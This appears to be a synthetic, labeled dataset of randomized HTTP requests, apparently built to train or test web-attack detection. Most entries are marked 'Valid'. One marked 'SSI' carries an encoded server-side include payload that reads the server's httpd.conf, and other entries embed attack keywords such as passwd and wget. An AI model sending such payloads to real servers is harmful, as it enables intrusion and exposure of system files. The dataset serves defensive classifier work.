----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fue=526291264&enbEosglaeft=06000860&Js9TidJ0z=43669&0w88vu5q=e&kCDLeechoJObrk=9730&8sxiils0e=5602652&HAuCoWOk8Y=ls&Ehto=aLvgk1&JgWb=221833&Ykfs=p&onxkOwiaasoe=p7Sz9DCCY8R&zsgnb5uuicor8im=oullrboot.ininnodeate9&detutn=taN=qt SGm0ohm(o=

End - Id: 7824
Start - Id: 17627
class: Valid
GET /8qC9SDpfo/HIL.shtml?a8=okueoz&ot=aSXSctr&0bdrjon=RdeU%28tta&ssncsd=rafuehe9erys&1LiMbN_positiondXo=895816595&rid=ntt&WZmla5f=et%7E&Wr.HB@MHYboot.iniY=rl&osocsnaa4ra=Rahy&Ghe=nb%40O&Datettiwba4fya=tg-4De&sYi3e=nag&n0wHsttt=%5Dbmeta%7Ee9oMimdt%5D HTTP/1.0
Host: www.eadma1.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: 5-et, oKrare-neoueR, i38-shk;q=0.5, ioe-nilf, gDai3p-lee8
Cache-Control: no-cache
Client-ip: 56.224.2.13
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="65"
Date: Tue, 24 Jun 08 05:44:10 GMT
ETag: W/"z1QmfgMu-ng6LclTRcp"
Expect: 100-continue
From: oTii@htOg.it
If-Modified-Since: Tue, 27 Apr 10 03:31:12 UTC
If-Unmodified-Since: Thu, 14 Jul 05 12:57:26 CET
If-Match: *
If-None-Match: "jBNzXJtGCxNJUrh8pkD@"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/ote8cdid.gif
Authorization: NTLM NWRncnpmdWVORXRlQm9vb2RldGw0dGVlRTZzdWVkZWR0YWJjdHljdXJ6ZW5Ybg==
Range: -948
Referer: /sa5er/m0sToyo1/dmlary/nbsRtyuy.tar.gz
TE: trailers,deflate
Trailer: TE
User-Agent: Mozilla/1.7 (Windows; U; Windows NT 3.2; ot-dH; rv:7.7.9) Gecko/02021034
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 519x8664
Via: 3.0 www.5jlin.jpeg
Transfer-Encoding: identity
Upgrade: H9sne/9.0, ib5En9/0.4, Atedk/3.6, sfas8h/8.7
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 85327968366
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17627
Start - Id: 23474
class: Valid
GET /aO_/z-DQ.vi/rsfEUtALa@MKWU2t/oNVdiOnQfBaB/k3-.JuC6e@B.8NFJXEDb/r2QqF2K2R3eMj9cig1.dll?zn8aa2fBhis=53&Bhom1=oh&heios2sdfRt=idd&PnJi=8018789&pne32r=%27r&nca4gYE=t0ji&locationCKQ-c=h%3B9&uPane=6o HTTP/1.1
Host: 119.40.202.37
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.0
Accept-Language: n-Lea2dty;q=0.1, 5dun-oeibvta;q=0.8, lm6-1oe
Cache-Control: min-fresh=298
Client-ip: 224.56.190.112
Cookie: natmhmc6enedxph=Ai  a;oghets=x1ispgrirte;saandcd=f5)slutedxh vi]itelnetg;7ihgt=ntUchot
Cookie2: $Version="95"
Date: Sun, 28 Mar 04 15:13:11 CET
ETag: W/"SjKm9nIyWdXOh9AD"
Expect: 100-continue
From: nsiialel@smwti.cz
If-Modified-Since: Thu, 01 Jan 09 10:04:33 CET
If-Unmodified-Since: Sat, 03 Feb 07 09:16:22 GMT
If-Match: "gqXYgS-NZQCThcQVDI"
If-None-Match: "slPugrSWBysaOStxIoa"
If-Range: Fri, 13 Jul 07 15:13:25 UTC
Max-Forwards: 782
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="4EElwe"
Authorization: NTLM NXNSZW5jc210c2xudHJvaXZJZXRzeXBpZWVvd3J0cm5sbmttRWpXZQ==
Range: 43-,164-
Referer: /eaemycaa/tmilrqE/0r9h/aenlr/f8yadml.msf
TE: trailers
Trailer: From
User-Agent: msotNph (nt8OjmB_; haH6JeSW; yMD8dMTXT; nGLewTFSu; suPuQbNjYr)
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 543x2792
Via: 3.8 0.39.252.192
Transfer-Encoding: identity
Upgrade: tieehc/5.0, aratsh/2.3
Warning: 632 213.146.216.235 "ynotzmn2ssOhma9iksoi" 
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23474
Start - Id: 27989
class: Valid
GET /lwhMbtoatc5adel/sCU4/kslothojeeetnxarxtr.swf?MokeetcKa0=t-VI HTTP/1.1
Host: 24.179.18.174
Connection: s5urm
Accept: */*;q=0.3
Accept-Charset: x-mac-hebrew, windows-874, iso-2022-jp;q=0.1
Accept-Encoding: compress
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 236.19.47.127
Cookie: e1=sam'1c\n;7lmuh=82248833;opOs=640
Cookie2: $Version="037"
Date: Sat, 25 Oct 08 13:09:29 GMT
ETag: "U-ZT.5xfVBto0SqZShW"
Expect: 100-continue
From: cdnx2t@ottOry6.gov
If-Modified-Since: Fri, 31 Dec 04 15:41:02 GMT
If-Unmodified-Since: Sat, 02 Dec 06 22:34:00 UTC
If-Match: "zyPmLbxyr3eHJn7L"
If-None-Match: *
If-Range: *
Max-Forwards: 334
MIME-Version: 4.4
Pragma: koe=eget
Proxy-Authorization: Digest username="eAeuolls"
Authorization: nReIt zooeoCu=egmlo
Range: 26662-87
Referer: http://www.xtyl.be/nioT/d27ndiI.css
TE: trailers,chunked;q=0.4,trailers
Trailer: Range
User-Agent: Mozilla/9.4 (compatible; Konqueror/6.4; Unix; Gsdftdsne9; txdaaiiesp; andfa)
UA-CPU: MIPS
UA-Disp: 629,775,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5151x4689
Via: FTP/3.3 www.INsy.htm
Transfer-Encoding: identity
Upgrade: 5Dytss/2.7
Warning: 969 www.noihIl.css "easuh0yx4oo" 
X-Forwarded-For: 54.46.58.97
X-Serial-Number: 548711116
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27989
Start - Id: 27908
class: Valid
GET /5Mcmfroml_rjbgsoundK/xB6s/l.wgetVs0Tbinphpc0/3Ol1tbOoltam8/ccasPhqazs/BXTE1passwdVGGEgWssperl/k4x/1AA.f_5d.mspx? HTTP/1.1
Host: www.tni2R.biz:427
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip, identity
Accept-Language: 8hnnn-p;q=0.4, 4fv-ei, G-i64oe
Cache-Control: no-cache
Client-ip: 217.171.87.254
Cookie: ja4chdxe1lahki=sA_yc;ab=4109140;aAi4yrze2gsoerl=634;s1KtmpMM=ieTealocationteo+copyrvI
Cookie2: $Version="45"
Date: Thu, 31 May 07 24:48:22 GMT
ETag: "JbVVq_VFEPIK7qNsWH"
Expect: 7rwrf
From: ksaefm@Ittg.fr
If-Modified-Since: Wed, 05 Dec 07 07:52:50 CET
If-Unmodified-Since: Sun, 07 Mar 04 22:50:12 CET
If-Match: "-BmdJa3L6XfrrseSf"
If-None-Match: *
If-Range: Wed, 18 Oct 06 03:48:03 UTC
Max-Forwards: 9090
MIME-Version: 6.2
Pragma: TinTm='ofe2Ucn6'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM dGlzYmdndXJlc2F0ZW9saXJ3bnlpYnJkaXhVeGRidG9zczRxaGlzQTIxaHJhbw==
Range: 3160-,80-0,5378-
Referer: /odie/oshslede/dnoc5pt/iaeCred.php
TE: chunked;q=0.4,chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: n._TKS http://www.rabobw.uk
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 869x220
Via: FTP/5.6 243.223.116.48:76, hsarht/8.3 232.252.23.84
Transfer-Encoding: compress
Upgrade: uteN/1.8
Warning: 691 www.sindzeae.jpg:0 "9mntxonwreh" "Thu, 27 May 04 12:00:03 GMT"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 7257164
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27908
Start - Id: 29932
class: Valid
GET /l4xp_e6/8ohh.asmx?LOHyFDQYH2=e-SiUptO9&tetmadmanerd=oeecn2a425n&sadb=14136639&5euErn9Tlpsayee=xc&ttst5nrreraielm=%24andncr+&o0iq=ii%5DneyH%27i&sDsEurne0s=0TtN5s&gewaGe=hnsko%2Fez&fUf58iirTdmihu=iir8iltt&miu=etsqt1Aos%3Dsiee7w+s&taueeem9nboJTb=idI7ekidrop%3Bbdo&BDLDAR1Ckd=aToE2HzP&Euilnafdim=tlf%2Fmoaai0dch HTTP/1.0
Host: www.lqnhrnes9.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hrsc-lewTkae;q=0.4, ari0zwi-rkVJt, 9hsau7-airinr, ez-o19ioeo;q=0.1
Cache-Control: amu='enes5tl'
Client-ip: 244.242.110.52
Cookie: ehr=440;934oe=sfULAS7ux7WT
Cookie2: $Version="727"
Date: Thu, 20 Sep 07 09:24:28 UTC
ETag: W/"jNrK5NLTULV.AqSVGUtJ"
Expect: hvcbsn=mcurunea;tehe=hdouis
From: 2aa3teeO@agot.com
If-Modified-Since: Tue, 05 Apr 05 18:33:42 UTC
If-Unmodified-Since: Mon, 05 Oct 09 09:14:55 GMT
If-Match: *
If-None-Match: "inw-oUhQmIQUE.Oun"
If-Range: Sun, 19 Jun 05 07:04:52 UTC
Max-Forwards: 12
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic emZvRUU6bWhkY2k=
Authorization: Basic Tm5mdWFjMzpyYWR0c29MOQ==
Range: 70-
Referer: /mtOee/gchne/hMtrt.css
TE: chunked;q=0.1,gzip;q=0.2,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/8.8 (compatible; rd1dtsttR; Open BSD i586; etjotcvk; 9wanlrw)
UA-CPU: MIPS
UA-Disp: 5197,782,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 235x4796
Via: FTP/6.4 88.226.232.129, 9.2 www.svxatno.shtml:40
Transfer-Encoding: eeYrny; kwaeeqax=sqtt
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 104 138.33.119.134 "csahtespffsreexe" 
X-Forwarded-For: 43.204.198.183
X-Serial-Number: 89410
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29932
Start - Id: 39741
class: SSI
GET /eiIdE79jm55gVCW-AaMA/gyg7Qs@0R2n7jwZKhkAU/hcUi78rMn.php?lc1Ecsutietagps=lr&biF=%3Fyy2&lngirLtTysunoer=av%28t+hea&ulinkh6NH1=Zl&bplWHprocessing-instruction=Nadg%3Arvla%40te%24eloe&och=0419861&np=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E HTTP/1.0
Host: www.cts9j6nsny.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.2, compress;q=0.4, gzip, compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 127.62.226.109
Cookie: lrmoaenbdlUe=91;hrfoldwu=7;Lese7liwrh=feiframeelboot.inilen1omhha
Cookie2: $Version="7"
Date: Thu, 29 Sep 05 18:43:33 UTC
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: hs1el
From: n4tbla@ol8e.st
If-Modified-Since: Fri, 07 Jan 05 16:01:15 CET
If-Unmodified-Since: Sat, 24 May 08 02:05:14 CET
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic MnRkYTp1ZUVpcmVs
Range: -343,5-1
Referer: /aNatuea/Nceh/aw4crt.fgf
TE: deflate
Trailer: Host
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 1.2; sl-dc; rv:6.3.2) Gecko/29928695
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: 5.3 www.ofpllEa.gif
Transfer-Encoding: u0er; wtaT=elalt
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 43717297958345
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 39741
Start - Id: 936
class: Valid
GET /lnthslladsarswlyt/teelCraTVtemtenc/Ru2Xcat6hxpK/ohAkjv/adasetsetiaOhipkn.aspx?Neqstherarmrsr=oiKLAIuR HTTP/1.0
Host: 66.35.238.11
Connection: gdApO
Accept: image/*;q=0.6, application/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-Hato7
Cache-Control: nzrhohf=thKgni
Client-ip: 137.42.138.53
Cookie: thksgiaQairmHca=11;TAceo=nesszjttrtkruP
Cookie2: $Version="0"
Date: Mon, 05 Nov 07 09:05:21 UTC
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Sun, 18 Sep 05 20:49:44 CET
If-Unmodified-Since: Mon, 22 Nov 04 03:50:06 CET
If-Match: "hSQi-OdIav8Nv5E"
If-None-Match: *
If-Range: *
Max-Forwards: 714
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: Digest username="oteh"
Range: 37-165,99813-448132
Referer: /tjst/3Sodf/meoa/ttiyaoo/ulit.mp3
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 4.7; 41-Sc; rv:6.1.7) Gecko/50294598
UA-CPU: Sparc
UA-Disp: 705,7453,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 272x609
Via: FTP/3.3 252.233.63.73, 4.1 164.88.161.36, FTP/6.2 62.196.73.123
Transfer-Encoding: gzip
Upgrade: ero/9.1, efreh/0.0
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 936
Start - Id: 11907
class: Valid
GET /14OfPM/dafsobideCpArnqs/om/nrSxtziIocCq6RfLBit/ahTuTG87Rfz/oUilB35Qs/jtBXDQIrbJS_/eZmr.jpg? HTTP/1.0
Host: www.tasdeg3tN.cz
Connection: keep-alive
Accept: audio/x-wav;q=0.8, text/xml
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, gzip;q=0.5, identity, compress;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 141.7.159.107
Cookie: syueuotpsnnuT=+;ZadoxrnNTPel=5293;hela5ibhudtbuue=iat;omuipOlitnnt=liRm;HHgfxtermAa2LIH=OEgbetween6ifnwee6
Cookie2: $Version="5"
Date: Mon, 14 Jul 08 03:22:05 CET
ETag: "Ko8OgPUlO7.1e0o"
Expect: 100-continue
From: cwtdea@hotshneub.biz
If-Modified-Since: Sun, 14 Dec 08 04:50:06 UTC
If-Unmodified-Since: Mon, 27 Dec 04 21:25:14 GMT
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: *
If-Range: Sun, 11 May 08 21:23:14 UTC
Max-Forwards: 110
MIME-Version: 7.3
Pragma: l0='ha'
Proxy-Authorization: Digest opaque="ehheia"
Authorization: toro mrSeeeE=qg7awnt
Range: 2-,67-8,8-83703
Referer: /eAdf/sf9yiamh.php
TE: gzip,trailers
Trailer: Upgrade
User-Agent: 3ikeKi/3.3.5
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: sm7onw/7.3 254.43.137.190, 3.9 www.jisT.js
Transfer-Encoding: compress
Upgrade: oail/1.2, webxe/2.0
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11907
Start - Id: 851
class: Valid
GET /dkellatn8hHdz/0Q-/winntz9o/TYEGLGiex@/WOP/aasruTeRarkK9ed/d1cui5aekutr/8a5Wc6TPI/vpGlda5Hz2rf/ebzcusacAlostwp/hF1LyKNC03/tfsziJmqqn-Nobe.asp?na6=3573314440 HTTP/1.1
Host: www.3Plid6d.cz
Connection: 6ivafdNe
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 247.195.152.109
Cookie: fttrsepuAHmn=59926055;o2mate3Xsdn=ziAo 7rQ@hai=5
Cookie2: $Version="3"
Date: Thu, 13 Jul 06 19:48:01 CET
ETag: "zfjQ0YDRW@UwYAtQF9E"
Expect: 100-continue
From: ata5n@etEoNDt.biz
If-Modified-Since: Fri, 11 Feb 05 13:17:24 UTC
If-Unmodified-Since: Sun, 22 Jan 06 04:44:27 UTC
If-Match: "@1WNQmSozVbIWs_q"
If-None-Match: *
If-Range: *
Max-Forwards: 100
MIME-Version: 3.5
Pragma: tdnze=o
Proxy-Authorization: NTLM NGlyZWxmNGVlYkE5bTR1dGpyZWVUaGtyYXJ0ZXNwYWVvbWxlZA==
Authorization: NTLM aHJzbzZmbWNTeXRobXI3cm9PYnV0am5ib3R4ZWhyZGFjbnZlYW5hcnVlc25v
Range: 264605-828,9-,3-
Referer: /o2ssirit/neomg/1lrn/ohstodb.mp3
TE: gzip;q=0.5,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/8.6 (Windows; U; WinNT 5.5; go-l2; rv:6.8.0) Gecko/58248370
UA-CPU: x86
UA-Disp: 486,0670,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: Aqnsh/3.1 89.22.201.71:97934, 4.0 www.2Mtn.js, 2.5 www.ylmbs.html
Transfer-Encoding: gzip
Upgrade: ech/9.3, trbl/6.3
Warning: 053 www.usea.shtml "nnlclr4ng" "Mon, 14 Aug 06 16:09:38 CET"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 851
Start - Id: 23435
class: Valid
GET /7H/k@U_.htm?alh=m%24medr%29window.opentnrahtaccesvsejEo&TGcsu=5sock_streamY%3Bh&end9ofetqrAa8en=9seeibpassthru%3C%7E&5A3p-V6=%2Fli%5CM&bnczTxoochs3o1=62&wLratremtrh=%3Cvar&iaOngw=sewligscgtbtirhf&hgorDdvm=updatei%3A&Qxp_6v6qxMS=4&tyi3spenGa=ciDfqK8I4T.3&nseaWi=3wl0hnlOtIEwm&tpeMelnougj=ci&u5ioiaihuiiD6d=r7deitenoNtaeay HTTP/1.0
Host: www.iyii.fr
Connection: itho
Accept: text/xml
Accept-Charset: iso-8859-7, x-mac-turkish, x-mac-korean;q=0.2, x-mac-icelandic, cp-950;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: msEaebtx-reRrc, sxoqtd-necl;q=0.3, yTaseaie-ec6, otwitnn-neRlXac;q=0.9
Cache-Control: min-fresh=34323
Client-ip: 116.67.243.172
Cookie: wohp=0gzrausftHns;eiNciotioeA2=iG.
Cookie2: $Version="4"
Date: Wed, 25 Jan 06 05:13:21 UTC
ETag: "X0csyXE8WEvGg_zlTL"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Fri, 23 Feb 07 04:17:19 GMT
If-Unmodified-Since: Wed, 15 Oct 08 16:38:15 CET
If-Match: "CXDEuelnuhuvqrj_RR-"
If-None-Match: *
If-Range: *
Max-Forwards: 0581
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM YWNlYmlzQWJhYmVhVHNFc3ltb29jNmNLY2FlbWdydWVuNzlyc2VhZ2F0aWl2WW0=
Range: 47922-,-4850
Referer: /ToEnu/ubesnega.msf
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/0.1 (compatible; MSIE 2.4; Open BSD i386; edytah)
UA-CPU: PowerPC
UA-Disp: 3504,273,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: FTP/6.4 www.iea5ttsm.png
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 247.130.186.48
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23435
Start - Id: 34866
class: Valid
POST /rlm/hlPS/eix/w9lT9zjIwJdmNOK/rjA4Rpk5jj/iovpnuawehfnBcs93/cde/wejdgbahlhiEPre9uS/5ieymhrmtteieiytm/iorEk1soarithandoMg1.tiff? HTTP/1.0
Content-Length: 68
Content-Language: tig6sn9i,19B3kett
Content-Encoding: identity
Content-Location: http://www.mrbmlthI.ch/gEym/rieseeM/ROndaade.php3
Content-MD5: ZHlyeG5jZWV3emhqc2p0MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Sep 05 23:02:22 UTC
Last-Modified: Sun, 03 Feb 08 10:13:27 CET
Host: www.oy2ecsw.ch
Connection: keep-alive
Accept: text/html;q=0.6, image/png
Accept-Charset: x-mac-arabic;q=0.6, windows-1251, utf-8;q=0.5, iso-8859-8-i, x-mac-roman
Accept-Encoding: 
Accept-Language: a5tq-4ghsem;q=0.7, ye6di-uu6msode;q=0.8
Cache-Control: min-fresh=77971
Client-ip: 106.7.133.84
Cookie: nzp=omdrcasieorntIum6;bHcindiz9=523
Cookie2: $Version="6"
Date: Tue, 29 Mar 05 20:50:18 CET
ETag: W/"GWdSysx8IvCsLPPeu"
Expect: 100-continue
From: ssbalhb@aagj.ch
If-Modified-Since: Sat, 22 Dec 07 23:22:54 CET
If-Unmodified-Since: Thu, 03 Jan 08 03:04:56 UTC
If-Match: *
If-None-Match: *
If-Range: "UtA75cib9fS_.BsvRsA"
Max-Forwards: 5
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM a1dwZHVwZW91YWRudGFzczN6dHBBZWJodGVvOWh1b2xocw==
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: http://rAdimd.org/nmHg/Htrtqz/fqed/eTvyyaq.jpeg
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: et1d/7.8.4.1
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-Color: color8
UA-Pixels: 3738x0584
Via: 6.5 185.232.195.233
Transfer-Encoding: Ierag; mc1s=saa1s
Upgrade: prdbih/2.2, bi6b/4.4, hveXe/8.6, oehe5S/1.6, eo8La/9.0
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h2s5Cstahhbrmt=ge&@buG=tAovnetndeoeeab8&93i7lqb=fhe&Oiiso3erxx=tmpeh

End - Id: 34866
Start - Id: 4653
class: Valid
PUT /dSRij@LKjZlfVNGX/ggaTe9ki/l2DtMxcr.ErWl00D/er/ahtREd0t7/h9/9C8v1@/6nNia/allQDXBRS5EeK./tKkt36ii.ScVjH.aspx? HTTP/1.1
Content-Length: 209
Content-Language: oat,tmsghw,toi4
Content-Encoding: deflate
Content-Location: /Syeueub/Niir4e/rase9scn/SseabqVf.jsp
Content-MD5: YlNhc2V2enNvbjRvYm5uMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Jan 07 12:31:20 UTC
Last-Modified: Mon, 30 Aug 04 21:53:41 CET
Host: 73.216.11.80
Connection: close
Accept: video/*, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6166
Client-ip: 30.104.197.74
Cookie: Do1anaal=8ta
Cookie2: $Version="65"
Date: Sun, 20 Jul 08 07:54:11 CET
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 2detqky
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Thu, 30 Jun 05 12:37:51 GMT
If-Unmodified-Since: Wed, 22 Dec 04 14:49:46 CET
If-Match: "-0l17jvtvBaFX9Cw7wp1"
If-None-Match: "cEyGW_nCzCYHeEW_zUT"
If-Range: Mon, 03 Oct 05 22:44:04 UTC
Max-Forwards: 0128
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: NTLM dGJzb2wxaExlMXR1b3V5N3NpcnJkc2V0b3JFZHZpbTA=
Range: -2870,095-8
Referer: http://www.t8Drjt8.st/zhscn/dlhett/ubtrn/aoctemeu.bin
TE: chunked,gzip,deflate;q=0.1
Trailer: Authorization
User-Agent: n9uko.Mq http://www.ruanko2.ch
UA-CPU: 68000
UA-Disp: 0704,6679,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0964x700
Via: 5.7 63.255.23.217, 8.1 29.226.34.55, FTP/1.2 www.heei2e.css
Transfer-Encoding: compress
Upgrade: 4fZfWy/9.8, wdrsia/5.8, 9ie/8.3
Warning: 763 www.arneyt.css "apolmniteeOem0me" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

emdgd7lLadlmbga=064075&eeTw=9320&iKxEtrnsmrsh=hV&hirngocqo=63029&asrher=0chg4fIzoyAsy&qeprkawhn=8pec&7regA=nA&kzDRGgV=sOeee&avswkhth3smoepe=apaqad&zpHcceoan=vYkiy.&tTthwnyt3aN=are6ReneAesr&atesehlla=sTR6d8V06v

End - Id: 4653
Start - Id: 510
class: Valid
GET /rmPtelnet./BwBK@HpBNLT/A1xn/ly4prOioNe2btN/6ktszeddrOu/tiNZDrm6F3DVxYgf_0e/nnSEpxSKV/a2PAjypvKzY/di3alsedon3aqEnyo.js? HTTP/1.1
Host: www.9hjeg0lt.cz
Connection: hH7e3
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 133.168.110.42
Cookie: r7aTee8uoi=ajeEj7sDWM_a;Yv1FXC=ylocationsfSe2yto3Hh
Cookie2: $Version="21"
Date: Sun, 01 Jul 07 04:05:15 CET
ETag: W/"Hn_lPhgodt20DVNW"
Expect: d4tt
From: Csuh@ese7nna.be
If-Modified-Since: Wed, 23 Apr 08 24:21:33 GMT
If-Unmodified-Since: Mon, 01 May 06 19:20:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Dec 06 18:28:45 CET
Max-Forwards: 22
MIME-Version: 0.3
Pragma: ekis='Oosndmi'
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: Basic Y2V3c2liY2M6dGFwbm4=
Range: 8-08055,3-
Referer: http://www.m8ape3.com/renehm/nyetleDp/itOi/oel9Hen/nateG.php4
TE: chunked,chunked,trailers
Trailer: Expect
User-Agent: rt2gg (u8TjmkGk9; eF.a9b; erOa7t-aX4)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2278x9542
Via: 1.0 www.naewt.shtml:09, 2.0 www.tiemy.jpg:9982
Transfer-Encoding: deflate
Upgrade: 581r/9.4, euqs/4.6, ehl/3.1, uoE/5.0
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 9170010950
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 510
Start - Id: 38299
class: LdapInjection
